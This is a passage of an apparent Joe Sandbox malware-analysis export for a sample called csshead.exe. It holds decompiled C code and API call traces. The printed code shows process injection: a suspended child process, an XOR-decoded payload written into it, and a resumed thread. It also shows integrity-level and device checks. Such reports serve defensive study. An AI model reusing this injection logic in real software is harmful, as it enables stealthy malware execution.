    						CloseHandle(_v332.ExtendedRegisters);
    					}
    					goto L22;
    				}
    				_v44 = _t144 + 1;
    				_v32 = 0;
    				do {
    					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    					_v32 = _v32 + 1;
    					_t55 =  &_v44;
    					 *_t55 = _v44 - 1;
    					_t224 =  *_t55;
    				} while ( *_t55 != 0);
    				goto L9;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00405040
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
    • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00405209
    • CloseHandle.KERNEL32(?), ref: 004052C8
      • Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    • VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
    • WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ResumeThread.KERNELBASE(?), ref: 0040527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
    • CloseHandle.KERNEL32(?), ref: 004052BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 98%
    			E00405026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t125;
    				void* _t127;
    				void* _t144;
    				long _t154;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E004012DC(_a16) + 1;
    				}
    				E00401258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L23:
    					return _v8;
    				} else {
    					E00401164(E004010B4(_t109, 0x44),  &_v353);
    					E0040133C( &_v353, "_section");
    					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    					_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
    					_v12 = _t125;
    					_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
    					_v16 = _t127;
    					E004012B8(_v16, _v24, _a8);
    					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    					E004012B8(_v16 + _v24 + 8, _a20, _a16);
    					_v24 = 0x29b;
    					E004013B4( &_v28, _v24 + 0x11); // executed
    					E004012B8(_v28, _v24, 0x40a2ac);
    					_t144 = _v24 - 1;
    					if(_t144 < 0) {
    						L10:
    						_v20 = E004012DC( &_v353) + 1;
    						E004012B8(_v28 + _v24, _v20,  &_v353);
    						_v24 = _v24 + _v20;
    						_v40 = 0;
    						_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t229); // executed
    						_v40 = _t154;
    						if(_v40 == 0) {
    							E00401258( &_v332, 0xcc);
    							_v332.ContextFlags = 0x10007;
    							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    								_v40 = _v332.Eax;
    							}
    						}
    						_t233 = _v40;
    						if(_v40 == 0) {
    							_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t233);
    						}
    						if(_v40 != 0) {
    							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
    							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
    							E00401828(_v28); // executed
    							ResumeThread(_v124); // executed
    							if(_a24 == 0) {
    								__eflags = 0;
    								_v8 = 0;
    							} else {
    								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    									_v8 = 0xfffffffe;
    								} else {
    									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    								}
    							}
    							CloseHandle(_v124);
    							CloseHandle(_v332.ExtendedRegisters);
    						}
    						goto L23;
    					}
    					_v44 = _t144 + 1;
    					_v32 = 0;
    					do {
    						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    						_v32 = _v32 + 1;
    						_t55 =  &_v44;
    						 *_t55 = _v44 - 1;
    						_t229 =  *_t55;
    					} while ( *_t55 != 0);
    					goto L10;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00405040
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
    • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00405209
    • CloseHandle.KERNEL32(?), ref: 004052C8
      • Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    • VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
    • WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ResumeThread.KERNELBASE(?), ref: 0040527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
    • CloseHandle.KERNEL32(?), ref: 004052BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    APIs
    • RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
    • RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 0041849D
    • RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 004184A9
    • GetClassInfoExA.USER32(00442B90,AtlAxWin100,?), ref: 004184D0
    • LoadCursorA.USER32 ref: 0041850E
    • RegisterClassExA.USER32 ref: 00418531
    • GetClassInfoExA.USER32(00442B90,AtlAxWinLic100,?), ref: 0041857A
    • LoadCursorA.USER32 ref: 004185B2
    • RegisterClassExA.USER32 ref: 004185D5
    • RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 66%
    			E00406ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
    				intOrPtr _v4;
    				void* _v8;
    				void* _v12;
    				struct HINSTANCE__* _v16;
    				signed int _v20;
    				void* _v28;
    				CHAR* _v36;
    				void* _v157;
    				void* _v188;
    				char* __ebp;
    				void* _t115;
    
    				_t115 = __ecx;
    				_t57 = __eax;
    				if(__esi + 1 <= 0) {
    					L7:
    					__eflags =  *(_t115 - 0x45ffffff) & _t57;
    				} else {
    					if(__eflags <= 0) {
    						asm("lock lea eax, [ebp-0x209]");
    						if(E00401110(__eax, _v16) != 0) {
    							_v4 = 0xffffffff;
    						}
    						E00401440(_v16);
    						return _v4;
    					} else {
    						asm("rol esi, 1");
    						asm("sahf");
    						asm("out 0x48, al");
    						asm("salc");
    						asm("sbb [eax], eax");
    						__eax->i = __eax->i + __al;
    						__dh = __dh + __al;
    						asm("repne shl dl, 0x4a");
    						__ebp =  &_a1;
    						_push(es);
    						asm("rol byte [fs:eax], 0x0");
    						_push( &_a1);
    						__ebp = __esp;
    						__esp = __esp + 0xffffff44;
    						__eax = 0;
    						_v16 = 0;
    						__eax =  *0x40a55c; // 0x406ed0
    						_v36 = __eax;
    						__eax = _v36;
    						__eax = LoadLibraryA(_v36); // executed
    						_v20 = __eax;
    						__eax = _v36;
    						__eax = E00401440(_v36);
    						__eflags = _v20;
    						if (_v20 == 0) goto L13;
    						goto L7;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • LoadLibraryA.KERNELBASE(?), ref: 00406F0B
    • SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
    • SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    APIs
    • GetStartupInfoW.KERNEL32(?,0043CD78,00000058), ref: 00424C11
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00424C26
      • Part of subcall function 0042769E: HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
      • Part of subcall function 004260A2: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
      • Part of subcall function 004260A2: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
      • Part of subcall function 004260A2: TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
      • Part of subcall function 004260A2: TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 00426179
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 00426186
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 00426193
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL ref: 004261A0
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(Function_00015F05), ref: 004261C1
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(00000000), ref: 004261F0
      • Part of subcall function 004260A2: GetCurrentThreadId.KERNEL32 ref: 00426202
    • __RTC_Initialize.LIBCMT ref: 00424C97
      • Part of subcall function 0042CE7D: GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(?), ref: 0042CFBD
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
      • Part of subcall function 0042CE7D: GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(00000000), ref: 0042D059
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
      • Part of subcall function 0042CE7D: SetHandleCount.KERNEL32 ref: 0042D0B0
    • __amsg_exit.LIBCMT ref: 00424CAA
    • GetCommandLineA.KERNEL32 ref: 00424CB0
      • Part of subcall function 0042CDE6: GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
      • Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0042CE2E
      • Part of subcall function 0042CDE6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0042CE51
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042CD2B: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CD82
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CDC3
    • __amsg_exit.LIBCMT ref: 00424CD0
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CB10
    • __amsg_exit.LIBCMT ref: 00424CE1
      • Part of subcall function 00424443: __initterm_e.LIBCMT ref: 00424479
    • __amsg_exit.LIBCMT ref: 00424CF4
      • Part of subcall function 00419D20: CoInitialize.OLE32(00000000), ref: 00419D2C
      • Part of subcall function 00419D20: NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A
      • Part of subcall function 00419D20: GetCommandLineA.KERNEL32 ref: 00419DA4
      • Part of subcall function 00419D20: CreateMenu.USER32 ref: 00419EAE
      • Part of subcall function 00419D20: LoadMenuA.USER32(?,Menu), ref: 00419EC9
      • Part of subcall function 00419D20: LoadBitmapA.USER32(?,Bitmap), ref: 00419EDC
      • Part of subcall function 00419D20: AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
      • Part of subcall function 00419D20: LoadMenuA.USER32(?,Edit), ref: 00419EFF
      • Part of subcall function 00419D20: BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
      • Part of subcall function 00419D20: CreateMetaFileA.GDI32(?), ref: 00419F2B
      • Part of subcall function 00419D20: SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
      • Part of subcall function 00419D20: LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A
      • Part of subcall function 00419D20: FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
      • Part of subcall function 00419D20: GetSysColorBrush.USER32(0000000F), ref: 0041A084
      • Part of subcall function 00419D20: FrameRect.USER32(00000000,?,00000000), ref: 0041A094
      • Part of subcall function 00419D20: GlobalAlloc.KERNEL32(00001000,00000838), ref: 0041A0C0
      • Part of subcall function 00419D20: GetLastError.KERNEL32 ref: 0041A101
      • Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A12D
      • Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A14D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00407C4E(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    				void* _t24;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v16 = _t24;
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
    					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
    • ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
    • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
    • ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00407C50(CHAR* __eax) {
    				CHAR* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				long _v20;
    				intOrPtr _v24;
    				void _v84;
    				intOrPtr _v100;
    				void _v104;
    				void* _t24;
    
    				_v8 = __eax;
    				_v12 = 0;
    				_t24 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v16 = _t24;
    				if(_v16 == 0xffffffff) {
    					_v16 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0);
    				}
    				if(_v16 != 0xffffffff) {
    					ReadFile(_v16,  &_v84, 0x40,  &_v20, 0); // executed
    					SetFilePointer(_v16, _v24 + 4, 0, 0); // executed
    					ReadFile(_v16,  &_v104, 0x14,  &_v20, 0); // executed
    					CloseHandle(_v16);
    					_v12 = _v100;
    				}
    				return _v12;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407C71
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00407C93
    • ReadFile.KERNELBASE(000000FF,?,00000040,?,00000000), ref: 00407CB2
    • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000), ref: 00407CC7
    • ReadFile.KERNELBASE(000000FF,?,00000014,?,00000000), ref: 00407CDD
    • CloseHandle.KERNEL32(000000FF), ref: 00407CE7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 88%
    			E004042D4(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				void* _v20;
    				long _v24;
    				void** _v28;
    				intOrPtr _v32;
    				char* _v36;
    				intOrPtr* _v40;
    				signed int _t40;
    				signed int _t47;
    				signed int _t59;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_t40 = OpenProcessToken(_v8, 8,  &_v20);
    				asm("sbb eax, eax");
    				if( ~( ~_t40) == 0) {
    					L17:
    					_v12 = _v16;
    					return _v12;
    				}
    				_t47 = GetTokenInformation(_v20, 0x19, 0, 0,  &_v24); // executed
    				asm("sbb eax, eax");
    				if( ~( ~_t47) != 0 || GetLastError() != 0x7a) {
    					L16:
    					CloseHandle(_v20);
    					goto L17;
    				} else {
    					_v28 = E004013DC(_v24);
    					if(_v28 == 0) {
    						goto L16;
    					}
    					_t59 = GetTokenInformation(_v20, 0x19, _v28, _v24,  &_v24); // executed
    					asm("sbb eax, eax");
    					if( ~( ~_t59) != 0) {
    						_v36 = GetSidSubAuthorityCount( *_v28);
    						if(_v36 != 0 &&  *_v36 > 0) {
    							_v40 = GetSidSubAuthority( *_v28, ( *_v36 & 0x000000ff) - 1);
    							if(_v40 != 0) {
    								_v32 =  *_v40;
    								if(_v32 >= 0x2000) {
    									if(_v32 < 0x2000 || _v32 >= 0x3000) {
    										if(_v32 >= 0x3000) {
    											_v16 = 3;
    										}
    									} else {
    										_v16 = 2;
    									}
    								} else {
    									_v16 = 1;
    								}
    							}
    						}
    					}
    					E00401440(_v28);
    					goto L16;
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 004042EC
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 0040430E
    • GetLastError.KERNEL32 ref: 00404322
      • Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
      • Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00404358
    • GetSidSubAuthorityCount.ADVAPI32(?), ref: 0040436E
    • GetSidSubAuthority.ADVAPI32(?,?), ref: 00404393
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • CloseHandle.KERNEL32(?), ref: 004043F3
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    • Graph not rendered in this export; it covers basic blocks 424890-424945 with calls to RtlDecodePointer and RtlEncodePointer and subcalls to 4252ae and 42a170.
    APIs
    • RtlDecodePointer.NTDLL(00442BF0), ref: 004248A5
    • RtlDecodePointer.NTDLL ref: 004248B2
      • Part of subcall function 004252AE: RtlSizeHeap.NTDLL(00000000,00000000), ref: 004252D9
      • Part of subcall function 0042A170: Sleep.KERNEL32(00000000,00000000,00000000,?,0042490A,00000000,00000010,?,?,00424994,00000000,0043CD58,0000000C,004249C0,00000000), ref: 0042A19A
    • RtlEncodePointer.NTDLL(00000000), ref: 00424917
    • RtlEncodePointer.NTDLL(00000000), ref: 0042492B
    • RtlEncodePointer.NTDLL(-00000004), ref: 00424933
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Control-flow Graph

    • Graph not rendered in this export; it covers basic blocks 4047ac-40485b with calls to GetFileSize, ReadFile and CloseHandle and a subcall to 4013b4.
    C-Code - Quality: 100%
    			E004047AC(CHAR* __eax, void** __edx) {
    				CHAR* _v8;
    				void** _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				long _v28;
    				void* _t27;
    				void* _t43;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = 0xffffffff;
    				 *_v12 = 0;
    				_t27 = CreateFileA(_v8, 0x80000000, 1, 0, 3, 0, 0); // executed
    				_v20 = _t27;
    				if(_v20 == 0xffffffff) {
    					_t43 = CreateFileA(_v8, 0x80000000, 0, 0, 3, 0, 0); // executed
    					_v20 = _t43;
    				}
    				if(_v20 != 0xffffffff) {
    					_v24 = GetFileSize(_v20, 0);
    					if(_v24 != 0) {
    						E004013B4(_v12, _v24 + 1);
    						ReadFile(_v20,  *_v12, _v24,  &_v28, 0);
    						CloseHandle(_v20);
    						_v16 = _v24;
    					}
    				}
    				return _v16;
    			}

    APIs
    • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
    • CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
    • GetFileSize.KERNEL32(?,00000000), ref: 00404810
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
    • CloseHandle.KERNEL32(?), ref: 00404849
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    • Graph not rendered in this export; it covers basic blocks 42d0c2-42d15c with calls to GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount and RtlQueryPerformanceCounter.
    APIs
    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0042D0F9
    • GetCurrentProcessId.KERNEL32 ref: 0042D105
    • GetCurrentThreadId.KERNEL32 ref: 0042D10D
    • GetTickCount.KERNEL32 ref: 0042D115
    • RtlQueryPerformanceCounter.NTDLL(?), ref: 0042D121
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 75%
    			E00409347() {
    				void* _t16;
    				intOrPtr _t24;
    				intOrPtr _t29;
    				intOrPtr _t32;
    				intOrPtr _t42;
    				intOrPtr* _t47;
    				intOrPtr* _t49;
    				void* _t51;
    
    				_t16 =  *_t49(); // executed
